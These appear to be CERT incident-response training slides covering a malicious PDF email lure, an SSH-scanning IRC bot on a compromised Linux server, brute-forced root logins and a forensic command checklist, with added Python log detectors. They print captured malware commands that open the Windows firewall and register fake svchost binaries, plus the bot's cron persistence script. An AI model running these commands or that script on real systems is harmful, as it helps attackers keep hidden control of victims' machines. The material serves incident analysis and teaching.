2012 Sample Network Incident Cases


A few examples of security incidents handled on the internet


Sample network incident cases

tadej@cert.si

Copyright Carnegie Mellon University

Give a man a stolen credit card and he will eat like a king for a day. Teach him how to phish, and he will be provided for for the rest of his life.

-- ancient Nigerian proverb

Received: from [98.139.xxx.xxx] by web141006.mail.bf1.yahoo.com via HTTP; Wed, 11 Apr 2012 12:15:40 PDT
X-Mailer: YahooMailWebService/0.8.117.340979
References: <1333964698.56162.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333964778.34343.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333964865.49465.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333964990.45879.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333965126.47512.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333965576.34205.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333965781.74493.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333965883.95604.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333966100.81116.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966284.12608.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333966541.81116.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966617.34414.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333966670.88285.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966816.85842.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333968605.76830.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333968944.99197.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333969055.16421.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333969203.18144.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333969409.27611.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333969499.38548.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333969533.98850.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333969617.82064.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333969837.16102.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333970999.36974.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333971076.45397.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333971331.18898.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333976214.9952.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333978671.78505.YahooMailNeo@web141003.mail.bf1.yahoo.com>
Message-ID: <1334171740.94092.YahooMailNeo@web141006.mail.bf1.yahoo.com>
Date: Wed, 11 Apr 2012 12:15:40 -0700 (PDT)
From: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com>
Reply-To: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com>
Subject: =?utf-8?B?Rnc6IGZpbmFuxI1uYSBrYXJ0aWNhICggcmHEjXVub3ZvZHNrYSBzbHXFvmJh?= =?utf-8?B?KQ==?=
To: "xxxxxx.xxxxx@xxxxx.si"
Cc: xxxxx.xxxx@siol.net
In-Reply-To: <1333978671.78505.YahooMailNeo@web141003.mail.bf1.yahoo.com>

Operation: Process Create
Result: SUCCESS
Command line: "C:\Program Files\SumatraPDF\SumatraPDF.exe" "C:\Documents and Settings\tt\Application Data\navodila_pogodba_ePOBOT_AJPES.pdf"

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\svchost.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\svchost.exe:*:Enabled:Windows Messanger" /f
cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\Svchost32.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\Svchost32.exe:*:Enabled:Windows Messanger" /f

"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" + "IeXplorer32" "C:\Users\User\AppData\Roaming\Prometna_Kartica_Apr2012.exe"

$ whois 178.172.xxx.xxx

inetnum: 178.172.xxx.0 - 178.172.xxx.255
netname: ARNES-NET
descr: Academic and Research Network of Slovenia
descr: Ljubljana
descr: Slovenia

# netstat -anpt | more
...
178.172.xxx.xxx:44947 178.17.86.40:22 SYN_SENT -
178.172.xxx.xxx:40448 178.17.86.42:22 SYN_SENT -
178.172.xxx.xxx:47351 178.17.86.35:22 SYN_SENT -
178.172.xxx.xxx:57112 178.17.85.142:22 SYN_SENT -
178.172.xxx.xxx:44947 178.17.86.48:22 SYN_SENT -
178.172.xxx.xxx:40448 178.17.86.242:22 SYN_SENT -
178.172.xxx.xxx:47351 178.17.86.135:22 SYN_SENT -
178.172.xxx.xxx:57112 178.17.85.12:22 SYN_SENT -
178.172.xxx.xxx:44947 178.17.86.50:22 SYN_SENT -
178.172.xxx.xxx:40448 178.17.86.92:22 SYN_SENT -
178.172.xxx.xxx:47351 178.17.86.25:22 SYN_SENT -
178.172.xxx.xxx:57112 178.17.85.122:22 SYN_SENT -
...

# netstat -anpt | more
...
178.172.xxx.xxx:48174 208.83.20.130:6667 ESTABLISHED 5472/-bash
178.172.xxx.xxx:57221 194.109.20.90:6667 ESTABLISHED 5472/-bash
178.172.xxx.xxx:34110 195.197.175.21:7000 ESTABLISHED 5472/-bash
...
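An added detection example, not part of the original slides: the Python below parses netstat -anpt output of the kind shown above and flags the two patterns visible there, a host with half-open (SYN_SENT) SSH connections fanning out to many different addresses, which is what an outbound scan looks like from the compromised machine, and established sessions on IRC ports owned by one process. The sample input and the IRC port list are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample (not from the slides) in the shape of `netstat -anpt` output:
# a burst of half-open SSH connections to many hosts, plus established
# sessions to IRC ports owned by a process that calls itself "-bash".
SAMPLE = """\
tcp 0 1 10.0.0.5:44947 178.17.86.40:22 SYN_SENT -
tcp 0 1 10.0.0.5:40448 178.17.86.42:22 SYN_SENT -
tcp 0 1 10.0.0.5:47351 178.17.86.35:22 SYN_SENT -
tcp 0 1 10.0.0.5:57112 178.17.85.142:22 SYN_SENT -
tcp 0 1 10.0.0.5:44948 178.17.86.48:22 SYN_SENT -
tcp 0 1 10.0.0.5:40449 178.17.86.242:22 SYN_SENT -
tcp 0 0 10.0.0.5:48174 208.83.20.130:6667 ESTABLISHED 5472/-bash
tcp 0 0 10.0.0.5:57221 194.109.20.90:6667 ESTABLISHED 5472/-bash
tcp 0 0 10.0.0.5:34110 195.197.175.21:7000 ESTABLISHED 5472/-bash
tcp 0 0 10.0.0.5:22 193.2.1.10:60429 ESTABLISHED 22429/sshd
"""

# proto recv-q send-q local:port remote:port state pid/program
LINE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\S+)")
IRC_PORTS = {6667, 6668, 6669, 7000}  # assumption: usual plaintext IRC ports


def parse_netstat(text):
    """Turn netstat -anpt lines into dicts; lines that do not match are skipped."""
    conns = []
    for m in filter(None, map(LINE.match, text.splitlines())):
        conns.append({"laddr": m[1], "lport": int(m[2]), "raddr": m[3],
                      "rport": int(m[4]), "state": m[5], "prog": m[6]})
    return conns


def outbound_scans(conns, min_targets=5):
    """Remote ports with half-open (SYN_SENT) connections to at least
    min_targets distinct remote addresses, as {port: number_of_targets}."""
    targets = defaultdict(set)
    for c in conns:
        if c["state"] == "SYN_SENT":
            targets[c["rport"]].add(c["raddr"])
    return {p: len(a) for p, a in targets.items() if len(a) >= min_targets}


def irc_sessions(conns):
    """Established sessions to IRC ports, as (pid/program, remote addr, port)."""
    return sorted((c["prog"], c["raddr"], c["rport"]) for c in conns
                  if c["state"] == "ESTABLISHED" and c["rport"] in IRC_PORTS)
```

On the sample, outbound_scans reports port 22 with six distinct targets and irc_sessions returns the three connections held by the "5472/-bash" process.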

$ dig -x 208.83.20.130

130.20.83.208.in-addr.arpa. 195 IN PTR Tampa.FL.US.Undernet.org.
90.20.109.194.in-addr.arpa. 86400 IN PTR undernet.xs4all.nl.
21.175.197.195.in-addr.arpa. 14400 IN PTR irc2.saunalahti.fi.

# lsof -np 5472
...
-bash 5472 root txt REG 8,1 35352 /var/spool/samba/.bash/-bash
...

# file /var/spool/samba/.bash/*
./autorun: POSIX shell script text executable
./-bash: ELF 32-bit LSB executable, Intel 80386, version
./cron.d: ASCII text
./cyc.acc: ASCII text
./cyc.hold: a /usr/bin/perl script text executable
./cyc.pid: ASCII text
./cyc.session: ASCII text
./cyc.set: ASCII English text
./go: ASCII text
./mech.dir: ASCII text
./m.help: data
./pico: ELF 32-bit LSB executable, Intel 80386, version 1
./run: POSIX shell script text executable
./stealth: ELF 32-bit LSB executable, Intel 80386, version 1
./update: POSIX shell script text executable

$ cat /var/spool/samba/.bash/autorun
#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d && perl cyc.hold
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/cyc.pid; then
pid=\$(cat $dir/cyc.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1); then
exit 0
fi
fi
cd $dir
rm -rf cyc.hold
./run &>/dev/null" > update
chmod u+x update

$ grep Accepted secure
May 4 11:29:09 spxxxxx sshd[22429]: Accepted password for bxxx from 193.2.xxx.xxx port 60429 ssh2
May 4 11:29:52 spxxxxx sshd[22453]: Accepted password for bxxx from 193.2.xxx.xxx port 60438 ssh2
May 4 11:56:45 spxxxxx sshd[22697]: Accepted password for root from 209.172.51.39 port 48792 ssh2
May 4 16:05:46 spxxxxx sshd[23079]: Accepted password for root from 79.118.61.94 port 1079 ssh2
May 4 18:05:39 spxxxxx sshd[17116]: Accepted password for root from 14.63.213.191 port 48309 ssh2
May 5 10:42:35 spxxxxx sshd[22874]: Accepted password for root from 202.199.160.210 port 40019 ssh2
May 5 11:52:38 spxxxxx sshd[23117]: Accepted password for root from 86.124.223.6 port 2058 ssh2
May 5 11:56:29 spxxxxx sshd[23184]: Accepted password for root from 86.124.223.6 port 2061 ssh2
May 5 11:57:18 spxxxxx sshd[23197]: Accepted password for root from 86.124.223.6 port 2062 ssh2
May 5 11:57:28 spxxxxx sshd[23204]: Accepted password for root from 86.124.223.6 port 2063 ssh2
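An added example, not from the original slides: a Python check over sshd "Accepted" lines in the format above. It flags password logins as root from outside a trusted network and counts distinct source addresses per account, which makes the pattern on the slide (one local user, then root from several unrelated networks) stand out in a log of any length. The trusted network 193.2.0.0/16, the hostname and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample (not from the slides) in the format of `grep Accepted secure`:
# one password login by a local user from the campus network, then password
# logins as root from several unrelated networks.
SAMPLE_LOG = """\
May  4 11:29:09 host sshd[22429]: Accepted password for bxxx from 193.2.1.10 port 60429 ssh2
May  4 11:56:45 host sshd[22697]: Accepted password for root from 209.172.51.39 port 48792 ssh2
May  4 16:05:46 host sshd[23079]: Accepted password for root from 79.118.61.94 port 1079 ssh2
May  5 10:42:35 host sshd[22874]: Accepted publickey for admin from 193.2.1.11 port 40019 ssh2
May  5 11:52:38 host sshd[23117]: Accepted password for root from 86.124.223.6 port 2058 ssh2
May  5 11:56:29 host sshd[23184]: Accepted password for root from 86.124.223.6 port 2061 ssh2
"""

ACCEPTED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port \d+")

# Assumption: the networks from which interactive admin logins are expected.
TRUSTED = ("193.2.0.0/16",)


def parse_logins(text):
    """Accepted-login records as dicts with ts, method, user and src."""
    return [{"ts": m[1], "method": m[2], "user": m[3], "src": m[4]}
            for m in map(ACCEPTED.match, text.splitlines()) if m]


def suspicious_logins(logins, trusted=TRUSTED):
    """Password-authenticated root logins from outside the trusted networks."""
    nets = [ip_network(n) for n in trusted]
    return [l for l in logins
            if l["user"] == "root" and l["method"] == "password"
            and not any(ip_address(l["src"]) in net for net in nets)]


def sources_per_user(logins):
    """Distinct source addresses per account; root with many is a red flag."""
    srcs = defaultdict(set)
    for l in logins:
        srcs[l["user"]].add(l["src"])
    return {user: len(addrs) for user, addrs in srcs.items()}
```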

Now talking on #xhack
* Topic for #xhack is: ./a 178.17;./a 201.251;./a 195.76;./a 195.248;./a 81.211 129.25 128.32 144.30 134.50
* Topic for #xhack set by BaRoZ at Sun May 01 16:21:28 2011
...
<BaRoZ> nuf1f_ say a
<BaRoZ> nuf1f_ say a
<BaRoZ> +kb nuf1f_
* start__ sets ban on *!*userr@194.249.*.*
* You have been kicked from #xhack by start__ (Requested Kick)

* /who #xhack
* #xhack ~Fly 178.172.xxx.xxx *.undernet.org sasesase H :3 Powerd by move
* #xhack ~Fly 124.82.70.197 *.undernet.org informati H@ :3 Powerd by move
* #xhack ~Fly 121.241.77.194 *.undernet.org luccc H@ :3 Powerd by move
* #xhack ~Fly biophys3.physics.usyd.edu.au *.undernet.org biophys3 H@ :3 Powerd by move
* #xhack ~chattr 218.189.204.215 *.undernet.org DHL H@ :3 chattr
* #xhack ~Fly 93-44-208-192.ip98.fastwebnet.it *.undernet.org valy____ H@ :3 Powerd by move
* #xhack ~lolipop 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org part_ H@ :3 lolipop
* #xhack ~lolipop Edd.users.undernet.org *.undernet.org valyca H@x :3 lolipop
* #xhack ~luzar MService.users.undernet.org *.undernet.org VaLi H@x :3 luser
* #xhack ~alpha 62.94.13.227 *.undernet.org vali__ H@ :3 omega
* #xhack ~circ 82.193.22.182 *.undernet.org start__ H@ :3 circ
* #xhack ~chattr 82.193.22.182 *.undernet.org start___ H@ :3 chattr
* #xhack ~circ 122.99.166.142 *.undernet.org removed__ H@ :3 circ
* #xhack ~Fly 80.82.17.151 *.undernet.org xHaCk H@ :3 Powerd by move
* #xhack ~lolipop a83-161-134-137.adsl.xs4all.nl *.undernet.org valyca__ H@ :3 lolipop
* #xhack ~circ a83-161-134-137.adsl.xs4all.nl *.undernet.org removed H@ :3 circ
* #xhack ~chattr a83-161-134-137.adsl.xs4all.nl *.undernet.org moved H@ :3 chattr
* #xhack ~circ 62.94.13.227 *.undernet.org VaLi_ H@ :3 circ
* #xhack ~lolipop 82.193.22.182 *.undernet.org start_ H@ :3 lolipop
* #xhack ~lolipop 190.114.224.11 *.undernet.org valyca_ H@ :3 lolipop
* #xhack ~chattr 122.99.166.142 *.undernet.org VaLy___ H@ :3 chattr
* #xhack ~circ 190.114.224.11 *.undernet.org removed_ H@ :3 circ
* #xhack ~VaLy hax0r.users.undernet.org *.undernet.org BaRoZ H@x :3 VaLy
* #xhack ~Aly 50.16.26.202 *.undernet.org gzip H@ :3 Powerd by move
* #xhack ~chattr 190.114.224.11 *.undernet.org moved_ H@ :3 chattr
* #xhack ~UK mail.pjsind.co.uk *.undernet.org part____ H@ :3 Powerd by move
* #xhack ~circ Ezl.users.undernet.org *.undernet.org valentin H@x :3 circ
* #xhack ~bursuc sd-23267.dedibox.fr *.undernet.org VaLy_ H@ :3 Powerd by move
* #xhack ~lolipop 122.99.166.142 *.undernet.org valyca___ H@ :3 lolipop
* #xhack ~Fly 88.191.129.21 *.undernet.org Valeriu H@ :3 Powerd by move
* #xhack ~Fly 46.28.110.179 *.undernet.org pizdel H@ :3 Powerd by move
* #xhack ~Kitty xray426.server4you.de *.undernet.org move H@ :3 Powerd by move
* #xhack ~Fly v-182-163-56-103.ub-freebit.net *.undernet.org valy_____ H@ :3 Powerd by move
* #xhack ~chattr 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org cUc H@ :3 chattr
* #xhack :End of /WHO list.

# find / -ctime -10 -print
# find / -mtime -5 -ls
# find / -amin -120 -print
# stat somefile
# cat .bash_history
# ls -la
# ls -lct
# ls -l /proc/PID/
# ps -ef
# lsof -np PID
# lsof -ni TCP:22
# pstree -aAp
# last -i
# file somefile.bin
# strings somefile.bin
# chkrootkit
# rkhunter
